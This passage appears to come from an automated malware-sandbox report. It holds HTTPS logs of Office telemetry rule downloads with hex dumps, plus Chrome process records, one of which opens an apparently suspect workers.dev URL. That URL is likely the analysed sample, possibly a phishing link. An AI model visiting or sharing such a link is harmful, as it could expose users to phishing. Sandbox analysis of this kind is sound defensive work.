                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                146192.168.2.65855313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:13 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                                                x-ms-request-id: 76dbcc6a-501e-0035-36ed-16c923000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144213Z-1657d5bbd48tnj6wmberkg2xy8000000023000000000nyds
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                147192.168.2.65855413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:13 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                x-ms-request-id: 838d785c-001e-0014-24fe-165151000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144213Z-1657d5bbd48q6t9vvmrkd293mg000000025g000000003xx5
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                148192.168.2.65855713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:13 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                                                x-ms-request-id: cd0b82ba-d01e-0049-1304-17e7dc000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144213Z-1657d5bbd48sqtlf1huhzuwq7000000001w0000000008wme
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                149192.168.2.65855613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:13 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                                                x-ms-request-id: 8a56303a-c01e-0066-0f01-17a1ec000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144213Z-1657d5bbd48xsz2nuzq4vfrzg8000000021g0000000050f8
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                Start time:10:41:41
                                                                                                                                                                                                                                                                                Start date:06/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                Start time:10:41:44
                                                                                                                                                                                                                                                                                Start date:06/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1996,i,2053602945635669947,100357867303629952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                Start time:10:41:47
                                                                                                                                                                                                                                                                                Start date:06/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4="
                                                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                No disassembly